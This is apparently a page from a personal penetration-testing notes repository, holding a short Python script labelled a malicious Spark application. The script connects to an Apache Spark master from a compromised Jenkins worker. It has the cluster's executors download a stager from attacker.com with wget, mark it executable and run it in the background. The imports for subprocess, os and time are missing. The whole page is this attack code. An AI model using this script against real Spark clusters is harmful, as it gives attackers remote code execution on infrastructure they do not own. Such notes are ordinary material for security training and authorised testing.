Files
oscp/Necronomicon/Attacks/Dev Software & Databases/Apache Spark.md
T
2025-11-21 17:17:42 +01:00

767 B

  • Malicious Spark application - initializing Spark context
from pyspark import SparkContext, SparkConf
# Set up configuration options
conf = SparkConf()
conf = conf.setAppName("Word Count")
# Add the IP of the Spark master
conf = conf.setMaster("spark://<master_IP>:7077")
# Add the IP of the Jenkins worker we are currently on
conf = conf.set("spark.driver.host", "<worker_IP>")
# Initialize the Spark context with the necessary info to reach the master
sc = SparkContext(conf = conf)
partList = sc.parallelize(range(0, 1))
finalList = partList.map(
	lambda x: subprocess.Popen(
        "wget https://attacker.com/stager &&  chmod +x ./stager && ./stager &",
        shell=True,
        preexec_fn=os.setpgrp,
    )
)
finalList.collect()
time.sleep(10)